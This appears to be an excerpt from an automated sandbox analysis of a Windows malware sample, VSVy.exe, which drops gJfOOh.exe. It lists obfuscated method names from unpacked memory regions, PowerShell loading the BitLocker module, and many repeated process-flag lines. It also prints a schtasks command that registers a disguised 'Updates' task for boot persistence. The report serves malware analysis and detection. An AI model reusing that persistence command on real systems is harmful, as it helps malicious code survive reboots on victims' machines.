Source: 0.2.VSVy.exe.447b420.6.raw.unpack, oMDSaYYRMNNMy5VfMZ.cs	High entropy of concatenated method names: 'gxkNUJrv5e', 'RR4NIYLEwh', 'TUoNQI1MCB', 'BrOQKc6bxD', 'wOMQzB7j0w', 'OKqNkYQswx', 'bhxNrAGdvT', 'FW7N69FVxX', 'fUANBDgm03', 'EWvNoQqPsH'
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, S6q8GFqt3n1GOBenTk.cs	High entropy of concatenated method names: 'XRnBXYWolf', 'eQoBU6xRCZ', 'OqrBjXEUSB', 'FmABIg7XsE', 'yJEBbFpYvA', 'CvvBQdyxnO', 'CpVBNABHAE', 'vhxBqGEQrF', 'yYSB7Tacix', 'zdYBuKv79C'
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, wQSAsG6pNOb7pFtqdn.cs	High entropy of concatenated method names: 'D1dHVDnQV', 'YD2pDdOmN', 'omtw7oVsU', 'AMpZMw15q', 'uSWOgQnb1', 'r6cxuUbXu', 'EYodckNsGBEkaMyduu', 'zj9CmaJiU23Ai36Zno', 'tjH21uJga', 'XinRpqAVq'
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, twTNfiKb8tBU2cUUal.cs	High entropy of concatenated method names: 'AyURIxu4AN', 'VJcRbkgHZ3', 'g87RQEbo3a', 'rtjRNOY72Q', 'TDdRae9AXj', 'JhsRqWSaco', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, JkguQeIVDOPyJdc7Du.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'F7W6VRWgSX', 'UQ96K6Q2gi', 'QVH6zCFT8x', 'gQ7BkXrgA3', 'vCbBrX5kWY', 'fqBB6ElgDX', 'Je9BBGNZvy', 'i4w2qb6bwGlc2l3PWce'
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, ApGDyorooBMAocqJ6OU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Pd40aWLTZM', 'knF0RFsv1o', 'Kie09XbiMw', 'vNY00V7w8j', 'QnF0tmkMFf', 'PDB0llHdgK', 'Ogc0hkK4SM'
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, lC4I8sdOAG6ZfqykOA.cs	High entropy of concatenated method names: 'ywoGuIa29p', 'tCJG4g3WCK', 'ToString', 'CpuGUQIJtX', 'L3aGjLNhbF', 'hwlGIuHMty', 'kfwGbARiHy', 'ltuGQSinqY', 'i0sGNntXM8', 'khHGqqMy2O'
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, B5DSDenORf7OfAgO3T.cs	High entropy of concatenated method names: 'Jv5QXZ3s38', 'mSIQjk60OQ', 'bmIQbtK4cD', 'wyBQNkYf8R', 'dtvQqAN5He', 'w52bDkc9TA', 'og8bgwSW8t', 'lHlb1gqTik', 'RvrbEw0tE4', 'FIbbVBkBCS'
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, JwB9hNAUuhRD4qMKMu.cs	High entropy of concatenated method names: 'okJNcmfEAH', 'qiINWckl4x', 'n3LNHmmtHZ', 'WDsNpTxkBh', 'AngNytucUD', 'xouNwr4CNK', 'gF1NZPnWGg', 'k7dNCsW1Xq', 'iR1NOKicmE', 'JJFNxYecnH'
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, Rw6U9HoytPh3C58fNu.cs	High entropy of concatenated method names: 'WTjrNcOGR2', 'XZ5rqgWDXu', 'nrVru40VRt', 'G7Nr4pKYVF', 'FW8rv5cy5D', 'JDer8ORf7O', 'aSoZS0mgjWVQbLDGSf', 'iaaqv4jEsWpdtjsMII', 'h32rrFQR7d', 'N6RrBwGcRi'
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, eUuEe4OrV40VRtn7Np.cs	High entropy of concatenated method names: 'hhMIpnwKYE', 'qqTIwZ6ETF', 'zYbICywveu', 'wbuIOtS61d', 'DwmIvx8pIM', 'wNKI8fkvei', 'qNqIGTVBCO', 'gk7I26duHN', 'ueWIatT680', 'GtpIR3kdEc'
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, gcOGR2CVZ5gWDXuqnV.cs	High entropy of concatenated method names: 'JtKjTEJHfo', 'gatj5QdH2S', 'G7KjLIouVo', 'hcyjdafyKF', 'BL6jDC6HJq', 'i9GjgfR4Bw', 'Df3j1Hn7Ry', 'rtojE13tvP', 'hsYjVrRFXi', 'I6FjKcgVPX'
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, lurOhwghi3TY9aVipT.cs	High entropy of concatenated method names: 'b9YGEV9Axw', 'KuoGKcAWRy', 'qGQ2kh3Zck', 'wLG2r9ao1a', 'CTKGPtnE0Z', 'WvgGmLbgOf', 'v9AGiZ8v6Z', 'VrYGTxCpgk', 'tnJG5Z6MF6', 'nTGGLPTjIh'
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, ac6w5O1eEbbLSHhbcg.cs	High entropy of concatenated method names: 'q5KavWlCbJ', 'W21aGt4oQk', 'uufaa656b8', 'lvqa93DraN', 'FDQatTWb9U', 'z7EahUBJ4R', 'Dispose', 'dHd2UvUO3e', 'SsB2jPQOnV', 'JN22INeixm'
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, d9mYAbiG8Tuy8A3ufE.cs	High entropy of concatenated method names: 'CkafC174wm', 'PsIfOVacWy', 'rxJfntClVc', 'QDBfJoQQb7', 'uAPfe527po', 'KjBfSXailh', 'J1vfYpGojP', 'GdZfsDZuj8', 'LSgfFdRHS9', 'IYBfP2Hnnc'
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, yeorbijDlEpM0W5tPK.cs	High entropy of concatenated method names: 'Dispose', 'hbLrVSHhbc', 'pNr6JkmuH7', 'yiNAHWbeOx', 'V8brKL0rlp', 'Qdtrz0qUTD', 'ProcessDialogKey', 'wfI6k4bNq7', 'JrG6r1iAtt', 'YXF66RwTNf'
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, YYVFxextRxUwTnW85c.cs	High entropy of concatenated method names: 'uBHbyg9CiB', 'JJgbZ3Ey62', 'i3UI3ooS1l', 'WQnIeNXKW9', 'ob7ISVeqnw', 'aNWIMFqt6D', 'LV9IYTyT77', 'WfIIsIcM3G', 'erZIA3h5xQ', 'OWeIFiArVY'
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, RkPOokr6VwmXIDrvXG0.cs	High entropy of concatenated method names: 'ToString', 'fgR9C2l0XB', 'GeI9OTYph8', 'r0x9ximCa0', 'gBe9nCD1MY', 'yeV9J76ISo', 'Uvc93Eyp05', 'rU29eTYiPK', 'JgmE5eMbrVxMQiqmuQX', 'Kee6kqM8hD2OEmJEDvd'
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, zPWXsvrkcqmULf5tUA8.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oWbRPP2xUL', 'd5bRm2CgyE', 'WxLRiuhuEb', 'rCNRTM3vyS', 'AmaR501ca0', 'UdZRLfPUl1', 'ML8Rd2FeCT'
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, g4bNq7VSrG1iAttKXF.cs	High entropy of concatenated method names: 'svuansxNWr', 'IMmaJXH9tT', 'cFBa3NUF03', 'GeUaefLjlC', 'DjUaS89LIc', 'kFpaMBrZ5C', 'VtdaYkyfPw', 'hvXasN1NW6', 'aDJaAua1Jj', 'TIfaF2rS10'
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, Ym7FTqrrMHR6DHoFZ8m.cs	High entropy of concatenated method names: 'qDLRKGn7HK', 'sedRzGIIQA', 'cCn9kN2jbS', 'xIg9rYnQhT', 'hIp967R24t', 'ieb9B7sFdy', 'S5C9of0ZxS', 'pjx9X7JbIT', 'tSw9UXBfZb', 'Yme9joHOuy'
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, OARC1yL0uWy4BH6F7h.cs	High entropy of concatenated method names: 'ToString', 'TSX8PUuDrc', 'GPU8JIt8d2', 'w8b83YRbkx', 'b4X8e646oP', 'nFm8SKsiCQ', 'pDH8M9aHQa', 'LaC8YaDWBf', 'iNh8s90H3l', 'WhS8AvJGDx'
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, qXKZM5zrBxYMqPeTWi.cs	High entropy of concatenated method names: 'jheRwR8pxG', 'vT9RCNUfpG', 'j9BRONsGfF', 'ycXRnF6FTK', 'U5yRJoNqN5', 'Xr9RekXYI3', 'GOHRSQjZvX', 'mHvRhTjryt', 'sJlRc63jiL', 'R2iRWsANci'
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, oMDSaYYRMNNMy5VfMZ.cs	High entropy of concatenated method names: 'gxkNUJrv5e', 'RR4NIYLEwh', 'TUoNQI1MCB', 'BrOQKc6bxD', 'wOMQzB7j0w', 'OKqNkYQswx', 'bhxNrAGdvT', 'FW7N69FVxX', 'fUANBDgm03', 'EWvNoQqPsH'
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, S6q8GFqt3n1GOBenTk.cs	High entropy of concatenated method names: 'XRnBXYWolf', 'eQoBU6xRCZ', 'OqrBjXEUSB', 'FmABIg7XsE', 'yJEBbFpYvA', 'CvvBQdyxnO', 'CpVBNABHAE', 'vhxBqGEQrF', 'yYSB7Tacix', 'zdYBuKv79C'
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, wQSAsG6pNOb7pFtqdn.cs	High entropy of concatenated method names: 'D1dHVDnQV', 'YD2pDdOmN', 'omtw7oVsU', 'AMpZMw15q', 'uSWOgQnb1', 'r6cxuUbXu', 'EYodckNsGBEkaMyduu', 'zj9CmaJiU23Ai36Zno', 'tjH21uJga', 'XinRpqAVq'
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, twTNfiKb8tBU2cUUal.cs	High entropy of concatenated method names: 'AyURIxu4AN', 'VJcRbkgHZ3', 'g87RQEbo3a', 'rtjRNOY72Q', 'TDdRae9AXj', 'JhsRqWSaco', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, JkguQeIVDOPyJdc7Du.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'F7W6VRWgSX', 'UQ96K6Q2gi', 'QVH6zCFT8x', 'gQ7BkXrgA3', 'vCbBrX5kWY', 'fqBB6ElgDX', 'Je9BBGNZvy', 'i4w2qb6bwGlc2l3PWce'
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, ApGDyorooBMAocqJ6OU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Pd40aWLTZM', 'knF0RFsv1o', 'Kie09XbiMw', 'vNY00V7w8j', 'QnF0tmkMFf', 'PDB0llHdgK', 'Ogc0hkK4SM'
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, lC4I8sdOAG6ZfqykOA.cs	High entropy of concatenated method names: 'ywoGuIa29p', 'tCJG4g3WCK', 'ToString', 'CpuGUQIJtX', 'L3aGjLNhbF', 'hwlGIuHMty', 'kfwGbARiHy', 'ltuGQSinqY', 'i0sGNntXM8', 'khHGqqMy2O'
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, B5DSDenORf7OfAgO3T.cs	High entropy of concatenated method names: 'Jv5QXZ3s38', 'mSIQjk60OQ', 'bmIQbtK4cD', 'wyBQNkYf8R', 'dtvQqAN5He', 'w52bDkc9TA', 'og8bgwSW8t', 'lHlb1gqTik', 'RvrbEw0tE4', 'FIbbVBkBCS'
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, JwB9hNAUuhRD4qMKMu.cs	High entropy of concatenated method names: 'okJNcmfEAH', 'qiINWckl4x', 'n3LNHmmtHZ', 'WDsNpTxkBh', 'AngNytucUD', 'xouNwr4CNK', 'gF1NZPnWGg', 'k7dNCsW1Xq', 'iR1NOKicmE', 'JJFNxYecnH'
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, Rw6U9HoytPh3C58fNu.cs	High entropy of concatenated method names: 'WTjrNcOGR2', 'XZ5rqgWDXu', 'nrVru40VRt', 'G7Nr4pKYVF', 'FW8rv5cy5D', 'JDer8ORf7O', 'aSoZS0mgjWVQbLDGSf', 'iaaqv4jEsWpdtjsMII', 'h32rrFQR7d', 'N6RrBwGcRi'
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, eUuEe4OrV40VRtn7Np.cs	High entropy of concatenated method names: 'hhMIpnwKYE', 'qqTIwZ6ETF', 'zYbICywveu', 'wbuIOtS61d', 'DwmIvx8pIM', 'wNKI8fkvei', 'qNqIGTVBCO', 'gk7I26duHN', 'ueWIatT680', 'GtpIR3kdEc'
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, gcOGR2CVZ5gWDXuqnV.cs	High entropy of concatenated method names: 'JtKjTEJHfo', 'gatj5QdH2S', 'G7KjLIouVo', 'hcyjdafyKF', 'BL6jDC6HJq', 'i9GjgfR4Bw', 'Df3j1Hn7Ry', 'rtojE13tvP', 'hsYjVrRFXi', 'I6FjKcgVPX'
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, lurOhwghi3TY9aVipT.cs	High entropy of concatenated method names: 'b9YGEV9Axw', 'KuoGKcAWRy', 'qGQ2kh3Zck', 'wLG2r9ao1a', 'CTKGPtnE0Z', 'WvgGmLbgOf', 'v9AGiZ8v6Z', 'VrYGTxCpgk', 'tnJG5Z6MF6', 'nTGGLPTjIh'
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, ac6w5O1eEbbLSHhbcg.cs	High entropy of concatenated method names: 'q5KavWlCbJ', 'W21aGt4oQk', 'uufaa656b8', 'lvqa93DraN', 'FDQatTWb9U', 'z7EahUBJ4R', 'Dispose', 'dHd2UvUO3e', 'SsB2jPQOnV', 'JN22INeixm'
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, d9mYAbiG8Tuy8A3ufE.cs	High entropy of concatenated method names: 'CkafC174wm', 'PsIfOVacWy', 'rxJfntClVc', 'QDBfJoQQb7', 'uAPfe527po', 'KjBfSXailh', 'J1vfYpGojP', 'GdZfsDZuj8', 'LSgfFdRHS9', 'IYBfP2Hnnc'
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, yeorbijDlEpM0W5tPK.cs	High entropy of concatenated method names: 'Dispose', 'hbLrVSHhbc', 'pNr6JkmuH7', 'yiNAHWbeOx', 'V8brKL0rlp', 'Qdtrz0qUTD', 'ProcessDialogKey', 'wfI6k4bNq7', 'JrG6r1iAtt', 'YXF66RwTNf'
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, YYVFxextRxUwTnW85c.cs	High entropy of concatenated method names: 'uBHbyg9CiB', 'JJgbZ3Ey62', 'i3UI3ooS1l', 'WQnIeNXKW9', 'ob7ISVeqnw', 'aNWIMFqt6D', 'LV9IYTyT77', 'WfIIsIcM3G', 'erZIA3h5xQ', 'OWeIFiArVY'
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, RkPOokr6VwmXIDrvXG0.cs	High entropy of concatenated method names: 'ToString', 'fgR9C2l0XB', 'GeI9OTYph8', 'r0x9ximCa0', 'gBe9nCD1MY', 'yeV9J76ISo', 'Uvc93Eyp05', 'rU29eTYiPK', 'JgmE5eMbrVxMQiqmuQX', 'Kee6kqM8hD2OEmJEDvd'
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, zPWXsvrkcqmULf5tUA8.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oWbRPP2xUL', 'd5bRm2CgyE', 'WxLRiuhuEb', 'rCNRTM3vyS', 'AmaR501ca0', 'UdZRLfPUl1', 'ML8Rd2FeCT'
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, g4bNq7VSrG1iAttKXF.cs	High entropy of concatenated method names: 'svuansxNWr', 'IMmaJXH9tT', 'cFBa3NUF03', 'GeUaefLjlC', 'DjUaS89LIc', 'kFpaMBrZ5C', 'VtdaYkyfPw', 'hvXasN1NW6', 'aDJaAua1Jj', 'TIfaF2rS10'
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, Ym7FTqrrMHR6DHoFZ8m.cs	High entropy of concatenated method names: 'qDLRKGn7HK', 'sedRzGIIQA', 'cCn9kN2jbS', 'xIg9rYnQhT', 'hIp967R24t', 'ieb9B7sFdy', 'S5C9of0ZxS', 'pjx9X7JbIT', 'tSw9UXBfZb', 'Yme9joHOuy'
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, OARC1yL0uWy4BH6F7h.cs	High entropy of concatenated method names: 'ToString', 'TSX8PUuDrc', 'GPU8JIt8d2', 'w8b83YRbkx', 'b4X8e646oP', 'nFm8SKsiCQ', 'pDH8M9aHQa', 'LaC8YaDWBf', 'iNh8s90H3l', 'WhS8AvJGDx'
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, qXKZM5zrBxYMqPeTWi.cs	High entropy of concatenated method names: 'jheRwR8pxG', 'vT9RCNUfpG', 'j9BRONsGfF', 'ycXRnF6FTK', 'U5yRJoNqN5', 'Xr9RekXYI3', 'GOHRSQjZvX', 'mHvRhTjryt', 'sJlRc63jiL', 'R2iRWsANci'
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, oMDSaYYRMNNMy5VfMZ.cs	High entropy of concatenated method names: 'gxkNUJrv5e', 'RR4NIYLEwh', 'TUoNQI1MCB', 'BrOQKc6bxD', 'wOMQzB7j0w', 'OKqNkYQswx', 'bhxNrAGdvT', 'FW7N69FVxX', 'fUANBDgm03', 'EWvNoQqPsH'
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, S6q8GFqt3n1GOBenTk.cs	High entropy of concatenated method names: 'XRnBXYWolf', 'eQoBU6xRCZ', 'OqrBjXEUSB', 'FmABIg7XsE', 'yJEBbFpYvA', 'CvvBQdyxnO', 'CpVBNABHAE', 'vhxBqGEQrF', 'yYSB7Tacix', 'zdYBuKv79C'
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, wQSAsG6pNOb7pFtqdn.cs	High entropy of concatenated method names: 'D1dHVDnQV', 'YD2pDdOmN', 'omtw7oVsU', 'AMpZMw15q', 'uSWOgQnb1', 'r6cxuUbXu', 'EYodckNsGBEkaMyduu', 'zj9CmaJiU23Ai36Zno', 'tjH21uJga', 'XinRpqAVq'
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, twTNfiKb8tBU2cUUal.cs	High entropy of concatenated method names: 'AyURIxu4AN', 'VJcRbkgHZ3', 'g87RQEbo3a', 'rtjRNOY72Q', 'TDdRae9AXj', 'JhsRqWSaco', 'Next', 'Next', 'Next', 'NextBytes'
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, JkguQeIVDOPyJdc7Du.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'F7W6VRWgSX', 'UQ96K6Q2gi', 'QVH6zCFT8x', 'gQ7BkXrgA3', 'vCbBrX5kWY', 'fqBB6ElgDX', 'Je9BBGNZvy', 'i4w2qb6bwGlc2l3PWce'
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, ApGDyorooBMAocqJ6OU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Pd40aWLTZM', 'knF0RFsv1o', 'Kie09XbiMw', 'vNY00V7w8j', 'QnF0tmkMFf', 'PDB0llHdgK', 'Ogc0hkK4SM'
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, lC4I8sdOAG6ZfqykOA.cs	High entropy of concatenated method names: 'ywoGuIa29p', 'tCJG4g3WCK', 'ToString', 'CpuGUQIJtX', 'L3aGjLNhbF', 'hwlGIuHMty', 'kfwGbARiHy', 'ltuGQSinqY', 'i0sGNntXM8', 'khHGqqMy2O'
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, B5DSDenORf7OfAgO3T.cs	High entropy of concatenated method names: 'Jv5QXZ3s38', 'mSIQjk60OQ', 'bmIQbtK4cD', 'wyBQNkYf8R', 'dtvQqAN5He', 'w52bDkc9TA', 'og8bgwSW8t', 'lHlb1gqTik', 'RvrbEw0tE4', 'FIbbVBkBCS'
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, JwB9hNAUuhRD4qMKMu.cs	High entropy of concatenated method names: 'okJNcmfEAH', 'qiINWckl4x', 'n3LNHmmtHZ', 'WDsNpTxkBh', 'AngNytucUD', 'xouNwr4CNK', 'gF1NZPnWGg', 'k7dNCsW1Xq', 'iR1NOKicmE', 'JJFNxYecnH'
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, Rw6U9HoytPh3C58fNu.cs	High entropy of concatenated method names: 'WTjrNcOGR2', 'XZ5rqgWDXu', 'nrVru40VRt', 'G7Nr4pKYVF', 'FW8rv5cy5D', 'JDer8ORf7O', 'aSoZS0mgjWVQbLDGSf', 'iaaqv4jEsWpdtjsMII', 'h32rrFQR7d', 'N6RrBwGcRi'

Source: C:\Users\user\Desktop\VSVy.exe

File created: C:\Users\user\AppData\Roaming\gJfOOh.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\VSVy.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp337E.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
